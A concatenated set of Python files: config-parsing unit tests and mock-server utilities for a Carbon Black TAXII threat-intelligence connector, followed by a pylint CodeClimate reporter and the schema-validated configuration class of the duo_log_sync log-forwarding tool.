@mock.patch("taxii2client.common._HTTPConnection")
@mock.patch("os.path.exists")
def test_certificate_support_pem(self, path_exists_mock, http_connection_mock, verify_connected):
verify_connected.return_value = True
path_exists_mock.return_value = True
settings = [{"ioc_types": "domain", "url": "http://localhost:5000/taxii2",
"username": "user", "password": "<PASSWORD>", "cert": "/path/to/cert.pem"}]
self.make_driver(settings)
http_connection_mock.assert_called_with('user', 'pass', True, None, auth=None, cert='/path/to/cert.pem',
version='2.1')
@mock.patch("cbopensource.driver.taxii.TaxiiServer.verify_connected")
@mock.patch("taxii2client.common._HTTPConnection")
@mock.patch("os.path.exists")
def test_certificate_support_cert_key_pair(self, path_exists_mock, http_connection_mock, verify_connected):
verify_connected.return_value = True
path_exists_mock.return_value = True
settings = [{"ioc_types": "domain", "url": "http://localhost:5000/taxii2",
"username": "user", "password": "<PASSWORD>", "cert": "/path/to/cert,/path/to/key"}]
self.make_driver(settings)
http_connection_mock.assert_called_with('user', 'pass', True, None, auth=None,
cert=('/path/to/cert', '/path/to/key'), version='2.1')
if __name__ == "__main__":
unittest.main()
```
#### File: cb-taxii-connector/test/test_taxii_connector_config.py
```python
from typing import Dict
from unittest import TestCase
from cbopensource.connectors.taxii.taxii_connector_config import TaxiiConnectorConfiguration
from cbopensource.utilities.common_config import CommonConfigException
class TestConnectorConfig(TestCase):
@staticmethod
def minimal() -> Dict:
"""
Create and return a config structure with everything that does not have defaults.
NOTE: All supplied values are strings, as if read from a file.
:return:
"""
kwargs = {
"carbonblack_server_token": "<PASSWORD>",
"feed_retrieval_minutes": "22",
"listener_port": "4242",
}
return kwargs
# ----- Begin Tests ------------------------------------------------------------
def test_01a_config_minimal(self):
"""
Ensure config defaults work with the minimally supplied init values.
Config settings are:
cache_folder (str)
debug (bool)
feed_retrieval_minutes (int)
host_address (str)
https_proxy (str)
listener_address (str)
listener_port (int)
log_file_size (int)
log_level (str)
multi_core (bool)
pretty_print_json (bool)
carbonblack_server_token (str)
carbonblack_server_url (str)
skip_cb_sync (bool)
use_feed_stream (bool)
"""
cfg = TaxiiConnectorConfiguration.parse(self.minimal())
self.assertEqual('/usr/share/cb/integrations/cb-taxii-connector/cache', cfg['cache_folder'])
self.assertFalse(cfg['debug'])
self.assertEqual(22, cfg['feed_retrieval_minutes'])
self.assertEqual('127.0.0.1', cfg['host_address'])
assert 'https_proxy' not in cfg
self.assertEqual('0.0.0.0', cfg['listener_address'])
self.assertEqual(4242, cfg['listener_port'])
self.assertEqual(10485760, cfg['log_file_size'])
self.assertEqual('INFO', cfg['log_level'])
self.assertTrue(cfg['multi_core'])
self.assertFalse(cfg['pretty_print_json'])
self.assertEqual('DEADBEEF0000000000000000CAFEBABE', cfg['carbonblack_server_token'])
self.assertEqual('https://127.0.0.1', cfg['carbonblack_server_url'])
self.assertFalse(cfg['skip_cb_sync'])
self.assertTrue(cfg['use_feed_stream'])
def test_01b_config_empty(self):
"""
If we supply nothing, ensure we get the expected error.
"""
try:
TaxiiConnectorConfiguration.parse({})
self.fail("Did not get expected exception!")
except CommonConfigException as err:
assert "Configuration key 'carbonblack_server_token' is required" in str(err)
def test_02_cache_folder(self):
"""
Ensure 'cache_folder' can be defined.
"""
base = self.minimal()
base['cache_folder'] = "/usr/bin/foobar"
cfg = TaxiiConnectorConfiguration.parse(base)
self.assertEqual("/usr/bin/foobar", cfg['cache_folder'])
def test_03_debug(self):
"""
Ensure 'debug' can be defined.
"""
base = self.minimal()
base['debug'] = "true"
cfg = TaxiiConnectorConfiguration.parse(base)
self.assertEqual(True, cfg['debug'])
# NOTE: feed_retrieval_minutes part of all tests as required value
def test_04a_feed_retrieval_minutes_below_1(self):
"""
Ensure 'feed_retrieval_minutes' minimum is tracked.
"""
base = self.minimal()
base['feed_retrieval_minutes'] = "0"
try:
TaxiiConnectorConfiguration.parse(base)
self.fail("Did not get expected exception!")
except CommonConfigException as err:
assert "feed_retrieval_minutes' must be between 1 and 43200 (got 0)" in str(err)
def test_04b_feed_retrieval_minutes_above_max(self):
"""
Ensure 'feed_retrieval_minutes' maximum is tracked.
"""
base = self.minimal()
base['feed_retrieval_minutes'] = "100000"
try:
TaxiiConnectorConfiguration.parse(base)
self.fail("Did not get expected exception!")
except CommonConfigException as err:
assert "feed_retrieval_minutes' must be between 1 and 43200 (got 100000)" in str(err)
def test_05_host_address(self):
"""
Ensure 'host_address' can be defined.
"""
base = self.minimal()
base['host_address'] = "https://foo.com"
cfg = TaxiiConnectorConfiguration.parse(base)
self.assertEqual("https://foo.com", cfg['host_address'])
def test_06_https_proxy(self):
"""
Ensure 'https_proxy' can be defined.
"""
base = self.minimal()
base['https_proxy'] = "https://foo.com"
cfg = TaxiiConnectorConfiguration.parse(base)
self.assertEqual("https://foo.com", cfg['https_proxy'])
def test_07_listener_address(self):
"""
Ensure 'listener_address' can be defined.
"""
base = self.minimal()
base['listener_address'] = "https://foo.com"
cfg = TaxiiConnectorConfiguration.parse(base)
self.assertEqual("https://foo.com", cfg['listener_address'])
# NOTE: listener_port part of all tests as required value
def test_08a_listener_port_below_minimum(self):
"""
Ensure 'listener_port' minimum is tracked.
"""
base = self.minimal()
base['listener_port'] = "-20"
try:
TaxiiConnectorConfiguration.parse(base)
self.fail("Did not get expected exception!")
except CommonConfigException as err:
assert "'listener_port' must be between 1 and 65535 (got -20)" in str(err)
def test_08b_listener_port_above_maximum(self):
"""
Ensure 'listener_port' maximum is tracked.
"""
base = self.minimal()
base['listener_port'] = "70000"
try:
TaxiiConnectorConfiguration.parse(base)
self.fail("Did not get expected exception!")
except CommonConfigException as err:
assert "'listener_port' must be between 1 and 65535 (got 70000)" in str(err)
def test_09a_log_file_size(self):
"""
Ensure 'log_file_size' can be defined.
"""
base = self.minimal()
base['log_file_size'] = "12345678"
cfg = TaxiiConnectorConfiguration.parse(base)
self.assertEqual(12345678, cfg['log_file_size'])
def test_09b_log_file_size(self):
"""
        Ensure 'log_file_size' below the minimum is rejected.
"""
base = self.minimal()
base['log_file_size'] = "-1"
try:
TaxiiConnectorConfiguration.parse(base)
self.fail("Did not get expected exception!")
except CommonConfigException as err:
assert "log_file_size' must be between 1048576 and 1073741824 (got -1)" in str(err)
def test_10a_log_level(self):
"""
Ensure 'log_level' can be defined.
"""
base = self.minimal()
base['log_level'] = "warning"
cfg = TaxiiConnectorConfiguration.parse(base)
self.assertEqual("WARNING", cfg['log_level'])
def test_10b_log_level_unmatched(self):
"""
        Ensure an invalid log level is rejected.
"""
base = self.minimal()
base['log_level'] = "warn"
try:
TaxiiConnectorConfiguration.parse(base)
self.fail("Did not get expected exception!")
except CommonConfigException as err:
assert ("Configuration key 'log_level' must be in allowed values "
"['DEBUG', 'INFO', 'WARNING', 'ERROR']") in str(err)
def test_11_multi_core(self):
"""
Ensure 'multi_core' can be defined.
"""
base = self.minimal()
base['multi_core'] = "False"
cfg = TaxiiConnectorConfiguration.parse(base)
self.assertEqual(False, cfg['multi_core'])
def test_12_pretty_print_json(self):
"""
        Ensure 'pretty_print_json' can be defined.
"""
base = self.minimal()
base['pretty_print_json'] = "true"
cfg = TaxiiConnectorConfiguration.parse(base)
self.assertEqual(True, cfg['pretty_print_json'])
# NOTE: carbonblack_server_token part of all tests as required value
def test_13_carbonblack_server_url(self):
"""
Ensure 'carbonblack_server_url' can be defined.
"""
base = self.minimal()
base['carbonblack_server_url'] = "https://foo.com"
cfg = TaxiiConnectorConfiguration.parse(base)
self.assertEqual("https://foo.com", cfg['carbonblack_server_url'])
def test_14a_skip_cb_sync(self):
"""
Ensure 'skip_cb_sync' can be defined.
"""
base = self.minimal()
base['skip_cb_sync'] = "True"
cfg = TaxiiConnectorConfiguration.parse(base)
self.assertEqual(True, cfg['skip_cb_sync'])
def test_15a_feed_save_mode(self):
"""
Ensure 'feed_save_mode' can be defined.
"""
base = self.minimal()
base['feed_save_mode'] = "Stream"
cfg = TaxiiConnectorConfiguration.parse(base)
self.assertEqual("STREAM", cfg['feed_save_mode'])
self.assertEqual(True, cfg['use_feed_stream'])
def test_15b_save_mode_unmatched(self):
"""
        Ensure an invalid 'feed_save_mode' value is rejected.
"""
base = self.minimal()
base['feed_save_mode'] = "Saved"
try:
TaxiiConnectorConfiguration.parse(base)
self.fail("Did not get expected exception!")
except CommonConfigException as err:
assert "Configuration key 'feed_save_mode' must be in allowed values ['STREAM', 'BULK']" in str(err)
```
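A minimal usage sketch implied by the tests above: `TaxiiConnectorConfiguration.parse()` takes raw string values (as they would be read from a config file) and returns a dict-like config with typed values and defaults filled in. The module path comes from the test imports; the token value below is a placeholder.
```python
from cbopensource.connectors.taxii.taxii_connector_config import TaxiiConnectorConfiguration

raw = {
    "carbonblack_server_token": "example-token",   # placeholder value
    "feed_retrieval_minutes": "22",                # strings, as if read from a file
    "listener_port": "4242",
}
cfg = TaxiiConnectorConfiguration.parse(raw)
print(cfg["feed_retrieval_minutes"])   # 22 (parsed to int)
print(cfg["log_level"])                # "INFO" (default filled in)
```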
#### File: cb-taxii-connector/test/test_taxii_server_config.py
```python
import unittest
from unittest import mock
from cbopensource.driver.taxii_server_config import ServerVersion, TaxiiServerConfiguration
from cbopensource.utilities.common_config import CommonConfigException
from taxii2client.common import TokenAuth
class TaxiiServerConfigTests(unittest.TestCase):
def test_01a_server_config_parsed(self):
conf = {"url": "http://localhost:5000/taxii2", "username": "user", "password": "<PASSWORD>"}
conf_as_dict = TaxiiServerConfiguration.parse(conf)
self.assertEqual("http://localhost:5000/taxii2", conf_as_dict['url'])
self.assertEqual("user", conf_as_dict['user'])
self.assertEqual("pass", conf_as_dict['password'])
def test_01b_server_config_inited(self):
conf = {"url": "http://localhost:5000/taxii2", "username": "user", "password": "<PASSWORD>"}
conf_as_dict = TaxiiServerConfiguration.parse(conf)
self.assertEqual("http://localhost:5000/taxii2", conf_as_dict['url'])
self.assertEqual("user", conf_as_dict['user'])
self.assertEqual("pass", conf_as_dict['password'])
def test_02a_server_config_as_object(self):
conf = {"url": "http://localhost:5000/taxii2", "username": "user", "password": "<PASSWORD>"}
tsc = TaxiiServerConfiguration.parse(conf)
self.assertEqual("http://localhost:5000/taxii2", tsc['url'])
self.assertEqual("user", tsc['user'])
self.assertEqual("pass", tsc['password'])
def test_02b_server_config_as_object_get(self):
conf = {"url": "http://localhost:5000/taxii2", "username": "user", "password": "<PASSWORD>"}
tsc = TaxiiServerConfiguration.parse(conf)
assert 'verify' not in tsc
def test_03_server_config_defaults(self):
conf = {"url": "http://localhost:5000/taxii2", "username": "user", "password": "<PASSWORD>"}
tsc = TaxiiServerConfiguration.parse(conf)
self.assertEqual("http://localhost:5000/taxii2", tsc['url'])
self.assertEqual("user", tsc['user'])
self.assertEqual("pass", tsc['password'])
self.assertEqual(TaxiiServerConfiguration.DEFAULT_SCORE, tsc["score"])
self.assertEqual(TaxiiServerConfiguration.DEFAULT_PAGINATION, tsc["pagination"])
assert 'collections' not in tsc
assert 'version' not in tsc
    # NOTE: Since we have defaults handled in the test above, only differences will be checked in following tests
def test_04a_server_config_version_20(self):
conf = {"version": "v20", "url": "http://localhost:5000/taxii2", "username": "user", "password": "<PASSWORD>"}
tsc = TaxiiServerConfiguration.parse(conf)
self.assertEqual(ServerVersion["V20"], tsc["version"])
def test_04b_server_config_version_21(self):
conf = {"version": "v21", "url": "http://localhost:5000/taxii2", "username": "user", "password": "<PASSWORD>"}
tsc = TaxiiServerConfiguration.parse(conf)
self.assertEqual(ServerVersion["V21"], tsc["version"])
def test_04c_server_config_version_bad(self):
conf = {"version": "v23", "url": "http://localhost:5000/taxii2", "username": "user", "password": "<PASSWORD>"}
try:
TaxiiServerConfiguration.parse(conf)
self.fail("Did not see expected exception!")
except CommonConfigException as err:
assert "Version 'V23' not supported, supported versions are V21 and V20" in str(err)
def test_05_server_config_token(self):
conf = {"url": "http://localhost:5000/taxii2", "token": "<PASSWORD>"}
tsc = TaxiiServerConfiguration.parse(conf)
assert 'user' not in tsc
assert 'password' not in tsc
self.assertEqual(type(tsc['token']), TokenAuth)
self.assertEqual("averysecrettoken", tsc['token'].key)
def test_06a_server_config_pagination(self):
conf = {"pagination": '77', "url": "http://localhost:5000/taxii2", "username": "user", "password": "<PASSWORD>"}
tsc = TaxiiServerConfiguration.parse(conf)
self.assertEqual(77, tsc["pagination"])
def test_06b_server_config_pagination_below_low_bounds(self):
conf = {"pagination": str(TaxiiServerConfiguration.PAGINATION_LOW_BOUNDS - 1), "url": "http://localhost:5000/taxii2",
"username": "user", "password": "<PASSWORD>"}
try:
TaxiiServerConfiguration.parse(conf)
self.fail("Did not see expected exception!")
except CommonConfigException as err:
assert "'pagination' must be between 10 and 1000 (got 9)" in str(err)
def test_06c_server_config_pagination_above_high_bounds(self):
conf = {"pagination": str(TaxiiServerConfiguration.PAGINATION_HIGH_BOUNDS + 1),
"url": "http://localhost:5000/taxii2", "username": "user", "password": "<PASSWORD>"}
try:
TaxiiServerConfiguration.parse(conf)
self.fail("Did not see expected exception!")
except CommonConfigException as err:
assert "'pagination' must be between 10 and 1000 (got 1001)" in str(err)
def test_06d_server_config_pagination_bad_value(self):
conf = {"pagination": "afdsa", "url": "http://localhost:5000/taxii2", "username": "user", "password": "<PASSWORD>"}
try:
TaxiiServerConfiguration.parse(conf)
self.fail("Did not see expected exception!")
except CommonConfigException as err:
assert "Problem with configuration key 'pagination': invalid literal for int()" in str(err)
def test_07a_server_config_collections(self):
conf = {"collections": "collection-id-123456", "url": "http://localhost:5000/taxii2", "username": "user",
"password": "<PASSWORD>"}
tsc = TaxiiServerConfiguration.parse(conf)
self.assertListEqual(["collection-id-123456"], tsc['collections'])
def test_07b_server_config_collections_many(self):
conf = {"collections": "collection-id-123456,collection-id-21234214321,colleciton-id-134124321",
"url": "http://localhost:5000/taxii2", "username": "user", "password": "<PASSWORD>"}
tsc = TaxiiServerConfiguration.parse(conf)
self.assertListEqual(["collection-id-123456", "collection-id-21234214321", "colleciton-id-134124321"],
tsc['collections'])
def test_07c_server_config_collections_uniqueness(self):
conf = {"collections": "collection-id-123456,collection-id-123456,colleciton-id-134124321",
"url": "http://localhost:5000/taxii2", "username": "user", "password": "<PASSWORD>"}
try:
TaxiiServerConfiguration.parse(conf)
self.fail("Did not see expected exception!")
except CommonConfigException as err:
assert "'collections' - List entries must be unique" in str(err)
def test_08a_server_config_ioc_types(self):
conf = {"ioc_types": "address,hash,domain", "collections": "collection-id-123456",
"url": "http://localhost:5000/taxii2", "username": "user",
"password": "<PASSWORD>"}
tsc = TaxiiServerConfiguration.parse(conf)
self.assertListEqual(tsc["ioc_types"], ["address", "domain", "hash"])
def test_08b_server_config_ioc_types_invalid(self):
conf = {"ioc_types": "address,hash,ja3", "url": "http://localhost:5000/taxii2", "username": "user",
"password": "<PASSWORD>"}
try:
TaxiiServerConfiguration.parse(conf)
self.fail("Did not see expected exception!")
except CommonConfigException as err:
assert "'ioc_types' - Acceptable values (case insensitive) are: ['address', 'domain', 'hash']" in str(err)
# NOTE: cannot check ioc_type entries over max count as this is trapped by uniqueness check!
def test_09a_server_config_password_username_paired(self):
conf = {"url": "http://localhost:5000/taxii2", "password": "<PASSWORD>"}
try:
TaxiiServerConfiguration.parse(conf)
self.fail("Did not see expected exception!")
except CommonConfigException as err:
assert "'username' is required when 'password' is specified" in str(err)
def test_09b_server_config_username_password_paired(self):
conf = {"url": "http://localhost:5000/taxii2", "username": "pass"}
try:
TaxiiServerConfiguration.parse(conf)
self.fail("Did not see expected exception!")
except CommonConfigException as err:
assert "'password' is required when 'username' is specified" in str(err)
def test_10a_server_config_url_required(self):
conf = {"password": "<PASSWORD>", "username": "user"}
try:
TaxiiServerConfiguration.parse(conf)
self.fail("Did not see expected exception!")
except CommonConfigException as err:
assert "Configuration key 'url' is required" in str(err)
def test_10b_server_config_url_format(self):
conf = {"url": "htp://afdsfdasfdsa!$%", "password": "<PASSWORD>", "username": "user"}
try:
TaxiiServerConfiguration.parse(conf)
self.fail("Did not see expected exception!")
except CommonConfigException as err:
assert "Server url must match required format http(s)://<server>[:port]/taxii2" in str(err)
def test_11a_server_config_score(self):
conf = {"score": '25', "url": "http://localhost:5000/taxii2", "username": "user", "password": "<PASSWORD>"}
tsc = TaxiiServerConfiguration.parse(conf)
self.assertEqual(25, tsc["score"])
def test_11b_server_config_score_bad_value(self):
conf = {"score": "<PASSWORD>", "url": "http://localhost:5000/taxii2", "username": "user", "password": "<PASSWORD>"}
try:
TaxiiServerConfiguration.parse(conf)
self.fail("Did not see expected exception!")
except CommonConfigException as err:
assert "Problem with configuration key 'score': invalid literal for int()" in str(err)
@mock.patch("cbopensource.driver.taxii_server_config.os.path.exists")
def test_12a_server_config_cert(self, os_path_exists):
os_path_exists.return_value = True
conf = {"url": "http://localhost:5000/taxii2", "cert": "/path/to/cert.pem", "score": '99',
"verify": 'true'}
tsc = TaxiiServerConfiguration.parse(conf)
self.assertEqual("/path/to/cert.pem", tsc["cert"])
@mock.patch("os.path.exists")
def test_12b_server_config_cert_and_key(self, os_path_exists_mock):
os_path_exists_mock.return_value = True
conf = {"url": "http://localhost:5000/taxii2", "cert": "/path/to/cert,/path/to/key", "score": '99',
"verify": 'true'}
tsc = TaxiiServerConfiguration.parse(conf)
self.assertTupleEqual(("/path/to/cert", "/path/to/key"), tsc['cert'])
@mock.patch("os.path.exists")
def test_12c_server_config_cert_does_not_exist(self, os_path_exists_mock):
os_path_exists_mock.return_value = False
conf = {"url": "http://localhost:5000/taxii2", "cert": "/path/to/nothing", "score": '99',
"verify": 'true'}
try:
TaxiiServerConfiguration.parse(conf)
self.fail("Did not see expected exception!")
except CommonConfigException as err:
assert "does not exist" in str(err)
@mock.patch("cbopensource.driver.taxii_server_config.os.path.exists")
def test_12d_server_config_cert_too_many_entries(self, os_path_exists):
os_path_exists.return_value = True
conf = {"url": "http://localhost:5000/taxii2",
"cert": "/path/to/cert, /path/to/other, /yet/another/path", "score": '99',
"verify": 'true'}
try:
TaxiiServerConfiguration.parse(conf)
self.fail("Did not see expected exception!")
except CommonConfigException as err:
assert ("'cert' must be specified as the path to a .pem encoded cert+key pair or the comma separated"
" paths to a cert and a key file") in str(err)
def test_13_server_config_verify_bad(self):
conf = {"url": "http://localhost:5000/taxii2", "score": '99', "verify": 'trueafdsa'}
try:
TaxiiServerConfiguration.parse(conf)
self.fail("Did not see expected exception!")
except CommonConfigException as err:
assert ("Problem with configuration key 'verify': Only case-insensitive values "
"of 'true' or 'false' are allowed") in str(err)
if __name__ == '__main__':
unittest.main()
```
#### File: test/utils/generate_taxii_data.py
```python
import json
import stix2generator
config = stix2generator.generation.object_generator.TaxiiConnectorConfiguration(optional_property_probability=.25,
minimize_ref_properties=False)
object_generator = stix2generator.create_object_generator(object_generator_config=config)
def generate_random_indicator():
return object_generator.generate('indicator')
def get_manifest_for_indicator(indicator):
return {
"date_added": indicator["modified"],
"id": indicator["id"],
"media_type": "application/stix+json;version=2.1",
"version": indicator["modified"]
}
def generate_collection(n=100):
collection_data = {"objects":[], "manifest":[]}
for i in range(0,n):
indicator = generate_random_indicator()
manifest = get_manifest_for_indicator(indicator)
collection_data["objects"].append(indicator)
collection_data["manifest"].append(manifest)
return collection_data
print(json.dumps(generate_collection(12)))
```
#### File: test/utils/taxii_server.py
```python
import logging
import os
from medallion import (
application_instance, register_blueprints, set_config
)
log = logging.getLogger("medallion")
current_path = os.path.dirname(os.path.abspath(__file__))
configuration = {
"taxii": {"max_page_size": 100},
"backend": {"module": "medallion.backends.memory_backend", "module_class": "MemoryBackend",
"filename": f"{current_path}/mock_taxii_data.json"}
}
def start_taxii_server():
log.setLevel("DEBUG")
set_config(application_instance, "users", configuration)
set_config(application_instance, "taxii", configuration)
set_config(application_instance, "backend", configuration)
register_blueprints(application_instance)
application_instance.run()
``` |
{
"source": "jjfallete/duo_log_sync",
"score": 2
} |
#### File: _ci/lib/pylint_to_gitlab_codeclimate.py
```python
import hashlib
import six
import sys
from pylint.interfaces import IReporter
from pylint.reporters import JSONReporter
from pylint.lint import Run
# small portions taken from https://github.com/mercos/codeclimate-pylint
# no copyright or license was asserted as of February 2020
class GitlabCodeClimateReporter(JSONReporter):
__implements__ = IReporter
name = "gitlabcodeclimate"
def handle_message(self, msg):
codeclimate_dict = dict()
message_lines = self._parse_message(msg.msg).splitlines()
codeclimate_dict["description"] = message_lines[0]
location = dict()
location["path"] = msg.path
# gitlab only uses the "lines.begin" version of location
location["lines"] = {"begin": msg.line}
codeclimate_dict["location"] = location
# gitlab needs a fingerprint
# hash the issue, filename and line number
codeclimate_dict["fingerprint"] = hashlib.sha256(
(msg.symbol + msg.path + six.text_type(msg.line)).encode()
).hexdigest()
self.messages.append(codeclimate_dict)
def _parse_message(self, message):
while " " in message:
message = message.replace(" ", " ")
message = message.replace('"', "`")
message = message.replace("\\", "")
return message
if __name__ == "__main__":
Run(sys.argv[1:], reporter=GitlabCodeClimateReporter(), do_exit=False)
```
#### File: duo_log_sync/duologsync/config.py
```python
from datetime import datetime, timedelta
from cerberus import Validator, schema_registry
import yaml
from yaml import YAMLError
from duologsync.program import Program
class Config:
"""
This class is unique in that no instances of it should be created. It is
    used as a wrapper around a Dictionary object named config that contains
important values used throughout DuoLogSync. The _config class variable
should only be accessed through getter and setter methods and should only
be set once. There are useful methods defined in this class for generating
a config Dictionary from a YAML file, validating the config against a
Schema and setting defaults for a config Dictionary when optional fields
are not given values.
"""
# Format type constants
CEF = 'CEF'
JSON = 'JSON'
# Log type constants
ADMIN = 'adminaction'
AUTH = 'auth'
TELEPHONY = 'telephony'
TRUST_MONITOR = 'trustmonitor'
DIRECTORY_DEFAULT = '/tmp'
LOG_FILEPATH_DEFAULT = DIRECTORY_DEFAULT + '/' + 'duologsync.log'
LOG_FORMAT_DEFAULT = 'JSON'
API_OFFSET_DEFAULT = 180
API_TIMEOUT_DEFAULT = 120
CHECKPOINTING_ENABLED_DEFAULT = False
CHECKPOINTING_DIRECTORY_DEFAULT = DIRECTORY_DEFAULT
PROXY_SERVER_DEFAULT = ''
PROXY_PORT_DEFAULT = 0
# To understand these schema definitions better, compare side-by-side to
# the template_config.yml file
# Version of the config file
VERSION = {
'type': 'string',
'empty': False,
'required': True
}
# Fields for changing the functionality of DuoLogSync
DLS_SETTINGS = {
'type': 'dict',
'default': {},
'schema': {
'log_filepath': {
'type': 'string',
'empty': False,
'default': LOG_FILEPATH_DEFAULT
},
'log_format': {
'type': 'string',
'empty': False,
'allowed': [CEF, JSON],
'default': LOG_FORMAT_DEFAULT
},
'api': {
'type': 'dict',
'default': {},
'schema': {
'offset': {
'type': 'number',
'min': 0,
'max': 180,
'default': API_OFFSET_DEFAULT
},
'timeout': {
'type': 'number',
'default': API_TIMEOUT_DEFAULT
}
}
},
'checkpointing': {
'type': 'dict',
'default': {},
'schema': {
'enabled': {
'type': 'boolean',
'default': CHECKPOINTING_ENABLED_DEFAULT
},
'directory': {
'type': 'string',
'empty': False,
'default': CHECKPOINTING_DIRECTORY_DEFAULT}
}
},
'proxy': {
'type': 'dict',
'default': {},
'schema': {
'proxy_server': {
'type': 'string',
'default': PROXY_SERVER_DEFAULT
},
'proxy_port': {
'type': 'number',
'default': PROXY_PORT_DEFAULT
}
}
}
}
}
# Schema for a server inside of servers list
schema_registry.add(
'server',
{
'id': {'type': 'string', 'required': True, 'empty': False},
'hostname': {'type': 'string', 'required': True, 'empty': False},
'port': {
'type': 'integer',
'required': True,
'min': 0,
'max': 65535
},
'protocol': {
'type': 'string',
'required': True,
'oneof': [
{
'allowed': ['TCPSSL'],
'dependencies': ['cert_filepath']
},
{'allowed': ['TCP', 'UDP']}
]
},
'cert_filepath': {'type': 'string', 'empty': False}
})
# List of servers and how DLS will communicate with them
SERVERS = {
'type': 'list',
'required': True,
'minlength': 1,
'schema': {'type': 'dict', 'schema': 'server'}
}
# Describe which servers the logs of certain endpoints should be sent to
schema_registry.add(
'endpoint_server_mapping',
{
'server': {
'type': 'string',
'empty': False,
'required': True
},
'endpoints': {
'type': 'list',
'empty': False,
'required': True,
'allowed': [ADMIN, AUTH, TELEPHONY, TRUST_MONITOR]
}
}
)
# Account definition, which is used to access Duo logs and tell DLS which
# logs to fetch and to which servers those logs should be sent
ACCOUNT = {
'type': 'dict',
'required': True,
'schema': {
'skey': {'type': 'string', 'required': True, 'empty': False},
'ikey': {'type': 'string', 'required': True, 'empty': False},
'hostname': {'type': 'string', 'required': True, 'empty': False},
'endpoint_server_mappings': {
'type': 'list',
'empty': False,
'required': True,
'schema': {'type': 'dict', 'schema': 'endpoint_server_mapping'}
},
'is_msp': {'type': 'boolean', 'default': False},
'block_list': {'type': 'list', 'default': []}
}
}
# Schema for validating the structure of a config dictionary generated from
# a user-provided YAML file
SCHEMA = {
'version': VERSION,
'dls_settings': DLS_SETTINGS,
'servers': SERVERS,
'account': ACCOUNT
}
# Generate a Validator object with the given schema
SCHEMA_VALIDATOR = Validator(SCHEMA)
# Private class variable, should not be accessed directly, only through
# getter and setter methods
_config = None
# Used to ensure that the _config variable is set once and only once
_config_is_set = False
@classmethod
def _check_config_is_set(cls):
"""
Used to check that this Config object is set before trying to access
or set values
"""
if cls._config_is_set:
return
raise RuntimeError('Cannot access values of config before setting it')
@classmethod
def set_config(cls, config):
"""
Function used to set the config of a Config object once and only once.
@param config Dictionary used to set a Config object's 'config'
instance variable
"""
if cls._config_is_set:
raise RuntimeError('Config object already set. Cannot set Config '
'object more than once')
cls._config = config
cls._config_is_set = True
@classmethod
def get_value(cls, keys):
"""
Getter for a Config object's 'config' instance variable
"""
cls._check_config_is_set()
curr_value = cls._config
for key in keys:
curr_value = curr_value.get(key)
if curr_value is None:
raise ValueError(f"{key} is an invalid key for this Config")
return curr_value
@classmethod
def get_log_filepath(cls):
"""@return the filepath where DLS program messages should be saved"""
return cls.get_value(['dls_settings', 'log_filepath'])
@classmethod
def get_log_format(cls):
"""@return how Duo logs should be formatted"""
return cls.get_value(['dls_settings', 'log_format'])
@classmethod
def get_api_offset(cls):
"""@return the timestamp from which record retrieval should begin"""
return cls.get_value(['dls_settings', 'api', 'offset'])
@classmethod
def get_api_timeout(cls):
"""@return the seconds to wait between API calls"""
return cls.get_value(['dls_settings', 'api', 'timeout'])
@classmethod
def get_checkpointing_enabled(cls):
"""@return whether checkpoint files should be used to recover offsets"""
return cls.get_value(['dls_settings', 'checkpointing', 'enabled'])
@classmethod
def get_checkpoint_dir(cls):
"""@return the directory where checkpoint files should be stored"""
return cls.get_value(
['dls_settings', 'checkpointing', 'directory'])
@classmethod
def get_servers(cls):
"""@return the list of servers to which Duo logs will be written"""
return cls.get_value(['servers'])
@classmethod
def get_account_ikey(cls):
"""@return the ikey of the account in config"""
return cls.get_value(['account', 'ikey'])
@classmethod
def get_account_skey(cls):
"""@return the skey of the account in config"""
return cls.get_value(['account', 'skey'])
@classmethod
def get_account_hostname(cls):
"""@return the hostname of the account in config"""
return cls.get_value(['account', 'hostname'])
@classmethod
def get_account_endpoint_server_mappings(cls):
"""@return the endpoint_server_mappings of the account in config"""
return cls.get_value(['account', 'endpoint_server_mappings'])
@classmethod
def get_account_block_list(cls):
"""@return the block_list of the account in config"""
return cls.get_value(['account', 'block_list'])
@classmethod
def account_is_msp(cls):
"""@return whether the account in config is an MSP account"""
return cls.get_value(['account', 'is_msp'])
@classmethod
def get_proxy_server(cls):
"""@return the proxy_server in config"""
return cls.get_value(['dls_settings', 'proxy', 'proxy_server'])
@classmethod
def get_proxy_port(cls):
"""@return the proxy_port in config"""
return cls.get_value(['dls_settings', 'proxy', 'proxy_port'])
@classmethod
def create_config(cls, config_filepath):
"""
        Attempt to read the file at config_filepath and generate a config
        Dictionary object based on the defined Cerberus schema
@param config_filepath File from which to generate a config object
"""
shutdown_reason = None
try:
with open(config_filepath) as config_file:
# PyYAML gives better error messages for streams than for files
config_file_data = config_file.read()
config = yaml.full_load(config_file_data)
# Check config against a schema to ensure all the needed fields
# and values are defined
config = cls._validate_and_normalize_config(config)
if config.get('dls_settings').get('api').get('timeout') < cls.API_TIMEOUT_DEFAULT:
config['dls_settings']['api']['timeout'] = cls.API_TIMEOUT_DEFAULT
Program.log('DuoLogSync: Setting default api timeout to 120 seconds.')
# Will occur when given a bad filepath or a bad file
except OSError as os_error:
shutdown_reason = f"{os_error}"
Program.log('DuoLogSync: Failed to open the config file. Check '
'that the filename is correct')
# Will occur if the config file does not contain valid YAML
except YAMLError as yaml_error:
shutdown_reason = f"{yaml_error}"
Program.log('DuoLogSync: Failed to parse the config file. Check '
'that the config file has valid YAML.')
# Validation of the config against a schema failed
except ValueError:
shutdown_reason = f"{cls.SCHEMA_VALIDATOR.errors}"
Program.log('DuoLogSync: Validation of the config file failed. '
'Check that required fields have proper values.')
# No exception raised during the try block, return config
else:
# Calculate offset as a timestamp and rewrite its value in config
offset = config.get('dls_settings').get('api').get('offset')
offset = datetime.utcnow() - timedelta(days=offset)
config['dls_settings']['api']['offset'] = int(offset.timestamp())
return config
# At this point, it is guaranteed that an exception was raised, which
# means that it is shutdown time
Program.initiate_shutdown(shutdown_reason)
return None
@classmethod
def _validate_and_normalize_config(cls, config):
"""
Use a schema and the cerberus library to validate that the given config
dictionary has a valid structure
@param config Dictionary for which to validate the structure
"""
# Config is not a valid structure
if not cls.SCHEMA_VALIDATOR.validate(config):
raise ValueError
config = cls.SCHEMA_VALIDATOR.normalized(config)
return config
@staticmethod
def get_value_from_keys(dictionary, keys):
"""
Drill down into dictionary to retrieve a value given a list of keys
@param dictionary dict to retrieve a value from
        @param keys List of keys to follow to retrieve a value
@return value from the log found after following the list of keys given
"""
value = dictionary
for key in keys:
value = value.get(key)
if value is None:
break
return value
```
